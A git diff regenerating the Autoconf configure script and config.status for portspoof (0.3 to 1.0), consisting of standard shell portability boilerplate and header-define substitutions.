-s,^\([ #]*\)[^ ]*\([ ]*HAVE_SYS_WAIT_H\)[ (].*,\1define\2 1 , -s,^\([ #]*\)[^ ]*\([ ]*HAVE_SYS_TYPES_H\)[ (].*,\1define\2 1 , -s,^\([ #]*\)[^ ]*\([ ]*HAVE_SYS_STAT_H\)[ (].*,\1define\2 1 , -s,^\([ #]*\)[^ ]*\([ ]*HAVE_STDLIB_H\)[ (].*,\1define\2 1 , -s,^\([ #]*\)[^ ]*\([ ]*HAVE_STRING_H\)[ (].*,\1define\2 1 , -s,^\([ #]*\)[^ ]*\([ ]*HAVE_MEMORY_H\)[ (].*,\1define\2 1 , -s,^\([ #]*\)[^ ]*\([ ]*HAVE_STRINGS_H\)[ (].*,\1define\2 1 , -s,^\([ #]*\)[^ ]*\([ ]*HAVE_INTTYPES_H\)[ (].*,\1define\2 1 , -s,^\([ #]*\)[^ ]*\([ ]*HAVE_STDINT_H\)[ (].*,\1define\2 1 , -s,^\([ #]*\)[^ ]*\([ ]*HAVE_UNISTD_H\)[ (].*,\1define\2 1 , -s,^\([ #]*\)[^ ]*\([ ]*HAVE_FCNTL_H\)[ (].*,\1define\2 1 , -s,^\([ #]*\)[^ ]*\([ ]*HAVE_LIMITS_H\)[ (].*,\1define\2 1 , -s,^\([ #]*\)[^ ]*\([ ]*HAVE_NETDB_H\)[ (].*,\1define\2 1 , -s,^\([ #]*\)[^ ]*\([ ]*HAVE_NETINET_IN_H\)[ (].*,\1define\2 1 , -s,^\([ #]*\)[^ ]*\([ ]*HAVE_STDLIB_H\)[ (].*,\1define\2 1 , -s,^\([ #]*\)[^ ]*\([ ]*HAVE_STRING_H\)[ (].*,\1define\2 1 , -s,^\([ #]*\)[^ ]*\([ ]*HAVE_SYS_IOCTL_H\)[ (].*,\1define\2 1 , -s,^\([ #]*\)[^ ]*\([ ]*HAVE_SYS_SOCKET_H\)[ (].*,\1define\2 1 , -s,^\([ #]*\)[^ ]*\([ ]*HAVE_SYS_TIMEB_H\)[ (].*,\1define\2 1 , -s,^\([ #]*\)[^ ]*\([ ]*HAVE_SYSLOG_H\)[ (].*,\1define\2 1 , -s,^\([ #]*\)[^ ]*\([ ]*HAVE_UNISTD_H\)[ (].*,\1define\2 1 , -s,^\([ #]*\)[^ ]*\([ ]*HAVE_STDLIB_H\)[ (].*,\1define\2 1 , -s,^\([ #]*\)[^ ]*\([ ]*HAVE_MALLOC\)[ (].*,\1define\2 1 , -s,^\([ #]*\)[^ ]*\([ ]*HAVE_INET_NTOA\)[ (].*,\1define\2 1 , -s,^\([ #]*\)[^ ]*\([ ]*HAVE_MEMSET\)[ (].*,\1define\2 1 , -s,^\([ #]*\)[^ ]*\([ ]*HAVE_SOCKET\)[ (].*,\1define\2 1 , -s/ $// -s,^[ #]*u.*,/* & */, -CEOF - sed -f "$tmp/defines.sed" $ac_file_inputs >"$tmp/out1" -ac_result="$tmp/out1" - if test x"$ac_file" != x-; then - echo "/* $configure_input */" >"$tmp/config.h" - cat "$ac_result" >>"$tmp/config.h" - if diff $ac_file "$tmp/config.h" >/dev/null 2>&1; then - { echo "$as_me:$LINENO: $ac_file is unchanged" >&5 -echo "$as_me: $ac_file is unchanged" >&6;} - else - rm -f $ac_file - mv "$tmp/config.h" $ac_file - fi - else - echo "/* $configure_input */" - cat "$ac_result" - fi - rm -f "$tmp/out12" -# Compute $ac_file's index in $config_headers. -_am_stamp_count=1 -for _am_header in $config_headers :; do - case $_am_header in - $ac_file | $ac_file:* ) - break ;; - * ) - _am_stamp_count=`expr $_am_stamp_count + 1` ;; - esac -done -echo "timestamp for $ac_file" >`$as_dirname -- $ac_file || -$as_expr X$ac_file : 'X\(.*[^/]\)//*[^/][^/]*/*$' \| \ - X$ac_file : 'X\(//\)[^/]' \| \ - X$ac_file : 'X\(//\)$' \| \ - X$ac_file : 'X\(/\)' \| . 2>/dev/null || -echo X$ac_file | - sed '/^X\(.*[^/]\)\/\/*[^/][^/]*\/*$/{ - s//\1/ - q - } - /^X\(\/\/\)[^/].*/{ - s//\1/ - q - } - /^X\(\/\/\)$/{ - s//\1/ - q - } - /^X\(\/\).*/{ - s//\1/ - q - } - s/.*/./; q'`/stamp-h$_am_stamp_count - ;; - - :C) { echo "$as_me:$LINENO: executing $ac_file commands" >&5 -echo "$as_me: executing $ac_file commands" >&6;} - ;; - esac - - - case $ac_file$ac_mode in - "depfiles":C) test x"$AMDEP_TRUE" != x"" || for mf in $CONFIG_FILES; do - # Strip MF so we end up with the name of the file. - mf=`echo "$mf" | sed -e 's/:.*$//'` - # Check whether this is an Automake generated Makefile or not. - # We used to match only the files named `Makefile.in', but - # some people rename them; so instead we look at the file content. - # Grep'ing the first line is not enough: some people post-process - # each Makefile.in and add a new line on top of each file to say so. - # Grep'ing the whole file is not good either: AIX grep has a line - # limit of 2048, but all sed's we know have understand at least 4000. - if sed 10q "$mf" | grep '^#.*generated by automake' > /dev/null 2>&1; then - dirpart=`$as_dirname -- "$mf" || -$as_expr X"$mf" : 'X\(.*[^/]\)//*[^/][^/]*/*$' \| \ - X"$mf" : 'X\(//\)[^/]' \| \ - X"$mf" : 'X\(//\)$' \| \ - X"$mf" : 'X\(/\)' \| . 2>/dev/null || -echo X"$mf" | - sed '/^X\(.*[^/]\)\/\/*[^/][^/]*\/*$/{ - s//\1/ - q - } - /^X\(\/\/\)[^/].*/{ - s//\1/ - q - } - /^X\(\/\/\)$/{ - s//\1/ - q - } - /^X\(\/\).*/{ - s//\1/ - q - } - s/.*/./; q'` - else - continue - fi - # Extract the definition of DEPDIR, am__include, and am__quote - # from the Makefile without running `make'. - DEPDIR=`sed -n 's/^DEPDIR = //p' < "$mf"` - test -z "$DEPDIR" && continue - am__include=`sed -n 's/^am__include = //p' < "$mf"` - test -z "am__include" && continue - am__quote=`sed -n 's/^am__quote = //p' < "$mf"` - # When using ansi2knr, U may be empty or an underscore; expand it - U=`sed -n 's/^U = //p' < "$mf"` - # Find all dependency output files, they are included files with - # $(DEPDIR) in their names. We invoke sed twice because it is the - # simplest approach to changing $(DEPDIR) to its actual value in the - # expansion. - for file in `sed -n " - s/^$am__include $am__quote\(.*(DEPDIR).*\)$am__quote"'$/\1/p' <"$mf" | \ - sed -e 's/\$(DEPDIR)/'"$DEPDIR"'/g' -e 's/\$U/'"$U"'/g'`; do - # Make sure the directory exists. - test -f "$dirpart/$file" && continue - fdir=`$as_dirname -- "$file" || -$as_expr X"$file" : 'X\(.*[^/]\)//*[^/][^/]*/*$' \| \ - X"$file" : 'X\(//\)[^/]' \| \ - X"$file" : 'X\(//\)$' \| \ - X"$file" : 'X\(/\)' \| . 2>/dev/null || -echo X"$file" | - sed '/^X\(.*[^/]\)\/\/*[^/][^/]*\/*$/{ - s//\1/ - q - } - /^X\(\/\/\)[^/].*/{ - s//\1/ - q - } - /^X\(\/\/\)$/{ - s//\1/ - q - } - /^X\(\/\).*/{ - s//\1/ - q - } - s/.*/./; q'` - { as_dir=$dirpart/$fdir - case $as_dir in #( - -*) as_dir=./$as_dir;; - esac - test -d "$as_dir" || { $as_mkdir_p && mkdir -p "$as_dir"; } || { - as_dirs= - while :; do - case $as_dir in #( - *\'*) as_qdir=`echo "$as_dir" | sed "s/'/'\\\\\\\\''/g"`;; #( - *) as_qdir=$as_dir;; - esac - as_dirs="'$as_qdir' $as_dirs" - as_dir=`$as_dirname -- "$as_dir" || -$as_expr X"$as_dir" : 'X\(.*[^/]\)//*[^/][^/]*/*$' \| \ - X"$as_dir" : 'X\(//\)[^/]' \| \ - X"$as_dir" : 'X\(//\)$' \| \ - X"$as_dir" : 'X\(/\)' \| . 2>/dev/null || -echo X"$as_dir" | - sed '/^X\(.*[^/]\)\/\/*[^/][^/]*\/*$/{ - s//\1/ - q - } - /^X\(\/\/\)[^/].*/{ - s//\1/ - q - } - /^X\(\/\/\)$/{ - s//\1/ - q - } - /^X\(\/\).*/{ - s//\1/ - q - } - s/.*/./; q'` - test -d "$as_dir" && break - done - test -z "$as_dirs" || eval "mkdir $as_dirs" - } || test -d "$as_dir" || { { echo "$as_me:$LINENO: error: cannot create directory $as_dir" >&5 -echo "$as_me: error: cannot create directory $as_dir" >&2;} - { (exit 1); exit 1; }; }; } - # echo "creating $dirpart/$file" - echo '# dummy' > "$dirpart/$file" - done -done - ;; - - esac -done # for ac_tag - - -{ (exit 0); exit 0; } diff --git a/configure b/configure index 51d1d94..417c422 100755 --- a/configure +++ b/configure @@ -1,62 +1,85 @@ #! /bin/sh # Guess values for system-dependent variables and create Makefiles. -# Generated by GNU Autoconf 2.61 for portspoof 0.3. +# Generated by GNU Autoconf 2.65 for portspoof 1.0. +# +# Report bugs to . # -# Report bugs to . # # Copyright (C) 1992, 1993, 1994, 1995, 1996, 1998, 1999, 2000, 2001, -# 2002, 2003, 2004, 2005, 2006 Free Software Foundation, Inc. +# 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2009 Free Software Foundation, +# Inc. +# +# # This configure script is free software; the Free Software Foundation # gives unlimited permission to copy, distribute and modify it. -## --------------------- ## -## M4sh Initialization. ## -## --------------------- ## +## -------------------- ## +## M4sh Initialization. ## +## -------------------- ## # Be more Bourne compatible DUALCASE=1; export DUALCASE # for MKS sh -if test -n "${ZSH_VERSION+set}" && (emulate sh) >/dev/null 2>&1; then +if test -n "${ZSH_VERSION+set}" && (emulate sh) >/dev/null 2>&1; then : emulate sh NULLCMD=: - # Zsh 3.x and 4.x performs word splitting on ${1+"$@"}, which + # Pre-4.2 versions of Zsh do word splitting on ${1+"$@"}, which # is contrary to our usage. Disable this feature. alias -g '${1+"$@"}'='"$@"' setopt NO_GLOB_SUBST else - case `(set -o) 2>/dev/null` in - *posix*) set -o posix ;; + case `(set -o) 2>/dev/null` in #( + *posix*) : + set -o posix ;; #( + *) : + ;; esac - fi - - -# PATH needs CR -# Avoid depending upon Character Ranges. -as_cr_letters='abcdefghijklmnopqrstuvwxyz' -as_cr_LETTERS='ABCDEFGHIJKLMNOPQRSTUVWXYZ' -as_cr_Letters=$as_cr_letters$as_cr_LETTERS -as_cr_digits='0123456789' -as_cr_alnum=$as_cr_Letters$as_cr_digits +as_nl=' +' +export as_nl +# Printing a long string crashes Solaris 7 /usr/bin/printf. +as_echo='\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\' +as_echo=$as_echo$as_echo$as_echo$as_echo$as_echo +as_echo=$as_echo$as_echo$as_echo$as_echo$as_echo$as_echo +# Prefer a ksh shell builtin over an external printf program on Solaris, +# but without wasting forks for bash or zsh. +if test -z "$BASH_VERSION$ZSH_VERSION" \ + && (test "X`print -r -- $as_echo`" = "X$as_echo") 2>/dev/null; then + as_echo='print -r --' + as_echo_n='print -rn --' +elif (test "X`printf %s $as_echo`" = "X$as_echo") 2>/dev/null; then + as_echo='printf %s\n' + as_echo_n='printf %s' +else + if test "X`(/usr/ucb/echo -n -n $as_echo) 2>/dev/null`" = "X-n $as_echo"; then + as_echo_body='eval /usr/ucb/echo -n "$1$as_nl"' + as_echo_n='/usr/ucb/echo -n' + else + as_echo_body='eval expr "X$1" : "X\\(.*\\)"' + as_echo_n_body='eval + arg=$1; + case $arg in #( + *"$as_nl"*) + expr "X$arg" : "X\\(.*\\)$as_nl"; + arg=`expr "X$arg" : ".*$as_nl\\(.*\\)"`;; + esac; + expr "X$arg" : "X\\(.*\\)" | tr -d "$as_nl" + ' + export as_echo_n_body + as_echo_n='sh -c $as_echo_n_body as_echo' + fi + export as_echo_body + as_echo='sh -c $as_echo_body as_echo' +fi # The user is always right. if test "${PATH_SEPARATOR+set}" != set; then - echo "#! /bin/sh" >conf$$.sh - echo "exit 0" >>conf$$.sh - chmod +x conf$$.sh - if (PATH="/nonexistent;."; conf$$.sh) >/dev/null 2>&1; then - PATH_SEPARATOR=';' - else - PATH_SEPARATOR=: - fi - rm -f conf$$.sh -fi - -# Support unset when possible. -if ( (MAIL=60; unset MAIL) || exit) >/dev/null 2>&1; then - as_unset=unset -else - as_unset=false + PATH_SEPARATOR=: + (PATH='/bin;/bin'; FPATH=$PATH; sh -c :) >/dev/null 2>&1 && { + (PATH='/bin:/bin'; FPATH=$PATH; sh -c :) >/dev/null 2>&1 || + PATH_SEPARATOR=';' + } fi @@ -65,20 +88,18 @@ fi # there to prevent editors from complaining about space-tab. # (If _AS_PATH_WALK were called with IFS unset, it would disable word # splitting by setting IFS to empty value.) -as_nl=' -' IFS=" "" $as_nl" # Find who we are. Look in the path if we contain no directory separator. -case $0 in +case $0 in #(( *[\\/]* ) as_myself=$0 ;; *) as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH do IFS=$as_save_IFS test -z "$as_dir" && as_dir=. - test -r "$as_dir/$0" && as_myself=$as_dir/$0 && break -done + test -r "$as_dir/$0" && as_myself=$as_dir/$0 && break + done IFS=$as_save_IFS ;; @@ -89,32 +110,271 @@ if test "x$as_myself" = x; then as_myself=$0 fi if test ! -f "$as_myself"; then - echo "$as_myself: error: cannot find myself; rerun with an absolute file name" >&2 - { (exit 1); exit 1; } + $as_echo "$as_myself: error: cannot find myself; rerun with an absolute file name" >&2 + exit 1 fi -# Work around bugs in pre-3.0 UWIN ksh. -for as_var in ENV MAIL MAILPATH -do ($as_unset $as_var) >/dev/null 2>&1 && $as_unset $as_var +# Unset variables that we do not need and which cause bugs (e.g. in +# pre-3.0 UWIN ksh). But do not cause bugs in bash 2.01; the "|| exit 1" +# suppresses any "Segmentation fault" message there. '((' could +# trigger a bug in pdksh 5.2.14. +for as_var in BASH_ENV ENV MAIL MAILPATH +do eval test x\${$as_var+set} = xset \ + && ( (unset $as_var) || exit 1) >/dev/null 2>&1 && unset $as_var || : done PS1='$ ' PS2='> ' PS4='+ ' # NLS nuisances. -for as_var in \ - LANG LANGUAGE LC_ADDRESS LC_ALL LC_COLLATE LC_CTYPE LC_IDENTIFICATION \ - LC_MEASUREMENT LC_MESSAGES LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER \ - LC_TELEPHONE LC_TIME -do - if (set +x; test -z "`(eval $as_var=C; export $as_var) 2>&1`"); then - eval $as_var=C; export $as_var - else - ($as_unset $as_var) >/dev/null 2>&1 && $as_unset $as_var - fi -done +LC_ALL=C +export LC_ALL +LANGUAGE=C +export LANGUAGE + +# CDPATH. +(unset CDPATH) >/dev/null 2>&1 && unset CDPATH + +if test "x$CONFIG_SHELL" = x; then + as_bourne_compatible="if test -n \"\${ZSH_VERSION+set}\" && (emulate sh) >/dev/null 2>&1; then : + emulate sh + NULLCMD=: + # Pre-4.2 versions of Zsh do word splitting on \${1+\"\$@\"}, which + # is contrary to our usage. Disable this feature. + alias -g '\${1+\"\$@\"}'='\"\$@\"' + setopt NO_GLOB_SUBST +else + case \`(set -o) 2>/dev/null\` in #( + *posix*) : + set -o posix ;; #( + *) : + ;; +esac +fi +" + as_required="as_fn_return () { (exit \$1); } +as_fn_success () { as_fn_return 0; } +as_fn_failure () { as_fn_return 1; } +as_fn_ret_success () { return 0; } +as_fn_ret_failure () { return 1; } + +exitcode=0 +as_fn_success || { exitcode=1; echo as_fn_success failed.; } +as_fn_failure && { exitcode=1; echo as_fn_failure succeeded.; } +as_fn_ret_success || { exitcode=1; echo as_fn_ret_success failed.; } +as_fn_ret_failure && { exitcode=1; echo as_fn_ret_failure succeeded.; } +if ( set x; as_fn_ret_success y && test x = \"\$1\" ); then : + +else + exitcode=1; echo positional parameters were not saved. +fi +test x\$exitcode = x0 || exit 1" + as_suggested=" as_lineno_1=";as_suggested=$as_suggested$LINENO;as_suggested=$as_suggested" as_lineno_1a=\$LINENO + as_lineno_2=";as_suggested=$as_suggested$LINENO;as_suggested=$as_suggested" as_lineno_2a=\$LINENO + eval 'test \"x\$as_lineno_1'\$as_run'\" != \"x\$as_lineno_2'\$as_run'\" && + test \"x\`expr \$as_lineno_1'\$as_run' + 1\`\" = \"x\$as_lineno_2'\$as_run'\"' || exit 1 +test \$(( 1 + 1 )) = 2 || exit 1" + if (eval "$as_required") 2>/dev/null; then : + as_have_required=yes +else + as_have_required=no +fi + if test x$as_have_required = xyes && (eval "$as_suggested") 2>/dev/null; then : + +else + as_save_IFS=$IFS; IFS=$PATH_SEPARATOR +as_found=false +for as_dir in /bin$PATH_SEPARATOR/usr/bin$PATH_SEPARATOR$PATH +do + IFS=$as_save_IFS + test -z "$as_dir" && as_dir=. + as_found=: + case $as_dir in #( + /*) + for as_base in sh bash ksh sh5; do + # Try only shells that exist, to save several forks. + as_shell=$as_dir/$as_base + if { test -f "$as_shell" || test -f "$as_shell.exe"; } && + { $as_echo "$as_bourne_compatible""$as_required" | as_run=a "$as_shell"; } 2>/dev/null; then : + CONFIG_SHELL=$as_shell as_have_required=yes + if { $as_echo "$as_bourne_compatible""$as_suggested" | as_run=a "$as_shell"; } 2>/dev/null; then : + break 2 +fi +fi + done;; + esac + as_found=false +done +$as_found || { if { test -f "$SHELL" || test -f "$SHELL.exe"; } && + { $as_echo "$as_bourne_compatible""$as_required" | as_run=a "$SHELL"; } 2>/dev/null; then : + CONFIG_SHELL=$SHELL as_have_required=yes +fi; } +IFS=$as_save_IFS + + + if test "x$CONFIG_SHELL" != x; then : + # We cannot yet assume a decent shell, so we have to provide a + # neutralization value for shells without unset; and this also + # works around shells that cannot unset nonexistent variables. + BASH_ENV=/dev/null + ENV=/dev/null + (unset BASH_ENV) >/dev/null 2>&1 && unset BASH_ENV ENV + export CONFIG_SHELL + exec "$CONFIG_SHELL" "$as_myself" ${1+"$@"} +fi + + if test x$as_have_required = xno; then : + $as_echo "$0: This script requires a shell more modern than all" + $as_echo "$0: the shells that I found on your system." + if test x${ZSH_VERSION+set} = xset ; then + $as_echo "$0: In particular, zsh $ZSH_VERSION has bugs and should" + $as_echo "$0: be upgraded to zsh 4.3.4 or later." + else + $as_echo "$0: Please tell bug-autoconf@gnu.org and +$0: piotr[at]duszynski.eu about your system, including any +$0: error possibly output before this message. Then install +$0: a modern shell, or manually run the script under such a +$0: shell if you do have one." + fi + exit 1 +fi +fi +fi +SHELL=${CONFIG_SHELL-/bin/sh} +export SHELL +# Unset more variables known to interfere with behavior of common tools. +CLICOLOR_FORCE= GREP_OPTIONS= +unset CLICOLOR_FORCE GREP_OPTIONS + +## --------------------- ## +## M4sh Shell Functions. ## +## --------------------- ## +# as_fn_unset VAR +# --------------- +# Portably unset VAR. +as_fn_unset () +{ + { eval $1=; unset $1;} +} +as_unset=as_fn_unset + +# as_fn_set_status STATUS +# ----------------------- +# Set $? to STATUS, without forking. +as_fn_set_status () +{ + return $1 +} # as_fn_set_status + +# as_fn_exit STATUS +# ----------------- +# Exit the shell with STATUS, even in a "trap 0" or "set -e" context. +as_fn_exit () +{ + set +e + as_fn_set_status $1 + exit $1 +} # as_fn_exit + +# as_fn_mkdir_p +# ------------- +# Create "$as_dir" as a directory, including parents if necessary. +as_fn_mkdir_p () +{ + + case $as_dir in #( + -*) as_dir=./$as_dir;; + esac + test -d "$as_dir" || eval $as_mkdir_p || { + as_dirs= + while :; do + case $as_dir in #( + *\'*) as_qdir=`$as_echo "$as_dir" | sed "s/'/'\\\\\\\\''/g"`;; #'( + *) as_qdir=$as_dir;; + esac + as_dirs="'$as_qdir' $as_dirs" + as_dir=`$as_dirname -- "$as_dir" || +$as_expr X"$as_dir" : 'X\(.*[^/]\)//*[^/][^/]*/*$' \| \ + X"$as_dir" : 'X\(//\)[^/]' \| \ + X"$as_dir" : 'X\(//\)$' \| \ + X"$as_dir" : 'X\(/\)' \| . 2>/dev/null || +$as_echo X"$as_dir" | + sed '/^X\(.*[^/]\)\/\/*[^/][^/]*\/*$/{ + s//\1/ + q + } + /^X\(\/\/\)[^/].*/{ + s//\1/ + q + } + /^X\(\/\/\)$/{ + s//\1/ + q + } + /^X\(\/\).*/{ + s//\1/ + q + } + s/.*/./; q'` + test -d "$as_dir" && break + done + test -z "$as_dirs" || eval "mkdir $as_dirs" + } || test -d "$as_dir" || as_fn_error "cannot create directory $as_dir" + + +} # as_fn_mkdir_p +# as_fn_append VAR VALUE +# ---------------------- +# Append the text in VALUE to the end of the definition contained in VAR. Take +# advantage of any shell optimizations that allow amortized linear growth over +# repeated appends, instead of the typical quadratic growth present in naive +# implementations. +if (eval "as_var=1; as_var+=2; test x\$as_var = x12") 2>/dev/null; then : + eval 'as_fn_append () + { + eval $1+=\$2 + }' +else + as_fn_append () + { + eval $1=\$$1\$2 + } +fi # as_fn_append + +# as_fn_arith ARG... +# ------------------ +# Perform arithmetic evaluation on the ARGs, and store the result in the +# global $as_val. Take advantage of shells that can avoid forks. The arguments +# must be portable across $(()) and expr. +if (eval "test \$(( 1 + 1 )) = 2") 2>/dev/null; then : + eval 'as_fn_arith () + { + as_val=$(( $* )) + }' +else + as_fn_arith () + { + as_val=`expr "$@" || test $? -eq 1` + } +fi # as_fn_arith + + +# as_fn_error ERROR [LINENO LOG_FD] +# --------------------------------- +# Output "`basename $0`: error: ERROR" to stderr. If LINENO and LOG_FD are +# provided, also output the error to LOG_FD, referencing LINENO. Then exit the +# script with status $?, using 1 if that was 0. +as_fn_error () +{ + as_status=$?; test $as_status -eq 0 && as_status=1 + if test "$3"; then + as_lineno=${as_lineno-"$2"} as_lineno_stack=as_lineno_stack=$as_lineno_stack + $as_echo "$as_me:${as_lineno-$LINENO}: error: $1" >&$3 + fi + $as_echo "$as_me: error: $1" >&2 + as_fn_exit $as_status +} # as_fn_error -# Required to use basename. if expr a : '\(a\)' >/dev/null 2>&1 && test "X`expr 00001 : '.*\(...\)'`" = X001; then as_expr=expr @@ -128,13 +388,17 @@ else as_basename=false fi +if (as_dir=`dirname -- /` && test "X$as_dir" = X/) >/dev/null 2>&1; then + as_dirname=dirname +else + as_dirname=false +fi -# Name of the executable. as_me=`$as_basename -- "$0" || $as_expr X/"$0" : '.*/\([^/][^/]*\)/*$' \| \ X"$0" : 'X\(//\)$' \| \ X"$0" : 'X\(/\)' \| . 2>/dev/null || -echo X/"$0" | +$as_echo X/"$0" | sed '/^.*\/\([^/][^/]*\)\/*$/{ s//\1/ q @@ -149,294 +413,19 @@ echo X/"$0" | } s/.*/./; q'` -# CDPATH. -$as_unset CDPATH +# Avoid depending upon Character Ranges. +as_cr_letters='abcdefghijklmnopqrstuvwxyz' +as_cr_LETTERS='ABCDEFGHIJKLMNOPQRSTUVWXYZ' +as_cr_Letters=$as_cr_letters$as_cr_LETTERS +as_cr_digits='0123456789' +as_cr_alnum=$as_cr_Letters$as_cr_digits -if test "x$CONFIG_SHELL" = x; then - if (eval ":") 2>/dev/null; then - as_have_required=yes -else - as_have_required=no -fi - - if test $as_have_required = yes && (eval ": -(as_func_return () { - (exit \$1) -} -as_func_success () { - as_func_return 0 -} -as_func_failure () { - as_func_return 1 -} -as_func_ret_success () { - return 0 -} -as_func_ret_failure () { - return 1 -} - -exitcode=0 -if as_func_success; then - : -else - exitcode=1 - echo as_func_success failed. -fi - -if as_func_failure; then - exitcode=1 - echo as_func_failure succeeded. -fi - -if as_func_ret_success; then - : -else - exitcode=1 - echo as_func_ret_success failed. -fi - -if as_func_ret_failure; then - exitcode=1 - echo as_func_ret_failure succeeded. -fi - -if ( set x; as_func_ret_success y && test x = \"\$1\" ); then - : -else - exitcode=1 - echo positional parameters were not saved. -fi - -test \$exitcode = 0) || { (exit 1); exit 1; } - -( - as_lineno_1=\$LINENO - as_lineno_2=\$LINENO - test \"x\$as_lineno_1\" != \"x\$as_lineno_2\" && - test \"x\`expr \$as_lineno_1 + 1\`\" = \"x\$as_lineno_2\") || { (exit 1); exit 1; } -") 2> /dev/null; then - : -else - as_candidate_shells= - as_save_IFS=$IFS; IFS=$PATH_SEPARATOR -for as_dir in /bin$PATH_SEPARATOR/usr/bin$PATH_SEPARATOR$PATH -do - IFS=$as_save_IFS - test -z "$as_dir" && as_dir=. - case $as_dir in - /*) - for as_base in sh bash ksh sh5; do - as_candidate_shells="$as_candidate_shells $as_dir/$as_base" - done;; - esac -done -IFS=$as_save_IFS - - - for as_shell in $as_candidate_shells $SHELL; do - # Try only shells that exist, to save several forks. - if { test -f "$as_shell" || test -f "$as_shell.exe"; } && - { ("$as_shell") 2> /dev/null <<\_ASEOF -if test -n "${ZSH_VERSION+set}" && (emulate sh) >/dev/null 2>&1; then - emulate sh - NULLCMD=: - # Zsh 3.x and 4.x performs word splitting on ${1+"$@"}, which - # is contrary to our usage. Disable this feature. - alias -g '${1+"$@"}'='"$@"' - setopt NO_GLOB_SUBST -else - case `(set -o) 2>/dev/null` in - *posix*) set -o posix ;; -esac - -fi - - -: -_ASEOF -}; then - CONFIG_SHELL=$as_shell - as_have_required=yes - if { "$as_shell" 2> /dev/null <<\_ASEOF -if test -n "${ZSH_VERSION+set}" && (emulate sh) >/dev/null 2>&1; then - emulate sh - NULLCMD=: - # Zsh 3.x and 4.x performs word splitting on ${1+"$@"}, which - # is contrary to our usage. Disable this feature. - alias -g '${1+"$@"}'='"$@"' - setopt NO_GLOB_SUBST -else - case `(set -o) 2>/dev/null` in - *posix*) set -o posix ;; -esac - -fi - - -: -(as_func_return () { - (exit $1) -} -as_func_success () { - as_func_return 0 -} -as_func_failure () { - as_func_return 1 -} -as_func_ret_success () { - return 0 -} -as_func_ret_failure () { - return 1 -} - -exitcode=0 -if as_func_success; then - : -else - exitcode=1 - echo as_func_success failed. -fi - -if as_func_failure; then - exitcode=1 - echo as_func_failure succeeded. -fi - -if as_func_ret_success; then - : -else - exitcode=1 - echo as_func_ret_success failed. -fi - -if as_func_ret_failure; then - exitcode=1 - echo as_func_ret_failure succeeded. -fi - -if ( set x; as_func_ret_success y && test x = "$1" ); then - : -else - exitcode=1 - echo positional parameters were not saved. -fi - -test $exitcode = 0) || { (exit 1); exit 1; } - -( - as_lineno_1=$LINENO - as_lineno_2=$LINENO - test "x$as_lineno_1" != "x$as_lineno_2" && - test "x`expr $as_lineno_1 + 1`" = "x$as_lineno_2") || { (exit 1); exit 1; } - -_ASEOF -}; then - break -fi - -fi - - done - - if test "x$CONFIG_SHELL" != x; then - for as_var in BASH_ENV ENV - do ($as_unset $as_var) >/dev/null 2>&1 && $as_unset $as_var - done - export CONFIG_SHELL - exec "$CONFIG_SHELL" "$as_myself" ${1+"$@"} -fi - - - if test $as_have_required = no; then - echo This script requires a shell more modern than all the - echo shells that I found on your system. Please install a - echo modern shell, or manually run the script under such a - echo shell if you do have one. - { (exit 1); exit 1; } -fi - - -fi - -fi - - - -(eval "as_func_return () { - (exit \$1) -} -as_func_success () { - as_func_return 0 -} -as_func_failure () { - as_func_return 1 -} -as_func_ret_success () { - return 0 -} -as_func_ret_failure () { - return 1 -} - -exitcode=0 -if as_func_success; then - : -else - exitcode=1 - echo as_func_success failed. -fi - -if as_func_failure; then - exitcode=1 - echo as_func_failure succeeded. -fi - -if as_func_ret_success; then - : -else - exitcode=1 - echo as_func_ret_success failed. -fi - -if as_func_ret_failure; then - exitcode=1 - echo as_func_ret_failure succeeded. -fi - -if ( set x; as_func_ret_success y && test x = \"\$1\" ); then - : -else - exitcode=1 - echo positional parameters were not saved. -fi - -test \$exitcode = 0") || { - echo No shell found that supports shell functions. - echo Please tell autoconf@gnu.org about your system, - echo including any error possibly output before this - echo message -} - - - - as_lineno_1=$LINENO - as_lineno_2=$LINENO - test "x$as_lineno_1" != "x$as_lineno_2" && - test "x`expr $as_lineno_1 + 1`" = "x$as_lineno_2" || { - - # Create $as_me.lineno as a copy of $as_myself, but with $LINENO - # uniformly replaced by the line number. The first 'sed' inserts a - # line-number line after each line using $LINENO; the second 'sed' - # does the real work. The second script uses 'N' to pair each - # line-number line with the line containing $LINENO, and appends - # trailing '-' during substitution so that $LINENO is not a special - # case at line end. - # (Raja R Harinath suggested sed '=', and Paul Eggert wrote the - # scripts with optimization help from Paolo Bonzini. Blame Lee - # E. McMahon (1931-1989) for sed's syntax. :-) + as_lineno_1=$LINENO as_lineno_1a=$LINENO + as_lineno_2=$LINENO as_lineno_2a=$LINENO + eval 'test "x$as_lineno_1'$as_run'" != "x$as_lineno_2'$as_run'" && + test "x`expr $as_lineno_1'$as_run' + 1`" = "x$as_lineno_2'$as_run'"' || { + # Blame Lee E. McMahon (1931-1989) for sed's syntax. :-) sed -n ' p /[$]LINENO/= @@ -453,8 +442,7 @@ test \$exitcode = 0") || { s/-\n.*// ' >$as_me.lineno && chmod +x "$as_me.lineno" || - { echo "$as_me: error: cannot create $as_me.lineno; rerun with a POSIX shell" >&2 - { (exit 1); exit 1; }; } + { $as_echo "$as_me: error: cannot create $as_me.lineno; rerun with a POSIX shell" >&2; as_fn_exit 1; } # Don't try to exec as it changes $[0], causing all sort of problems # (the dirname of $[0] is not the place where we might find the @@ -464,49 +452,40 @@ test \$exitcode = 0") || { exit } - -if (as_dir=`dirname -- /` && test "X$as_dir" = X/) >/dev/null 2>&1; then - as_dirname=dirname -else - as_dirname=false -fi - ECHO_C= ECHO_N= ECHO_T= -case `echo -n x` in +case `echo -n x` in #((((( -n*) - case `echo 'x\c'` in + case `echo 'xy\c'` in *c*) ECHO_T=' ';; # ECHO_T is single tab character. - *) ECHO_C='\c';; + xy) ECHO_C='\c';; + *) echo `echo ksh88 bug on AIX 6.1` > /dev/null + ECHO_T=' ';; esac;; *) ECHO_N='-n';; esac -if expr a : '\(a\)' >/dev/null 2>&1 && - test "X`expr 00001 : '.*\(...\)'`" = X001; then - as_expr=expr -else - as_expr=false -fi - rm -f conf$$ conf$$.exe conf$$.file if test -d conf$$.dir; then rm -f conf$$.dir/conf$$.file else rm -f conf$$.dir - mkdir conf$$.dir + mkdir conf$$.dir 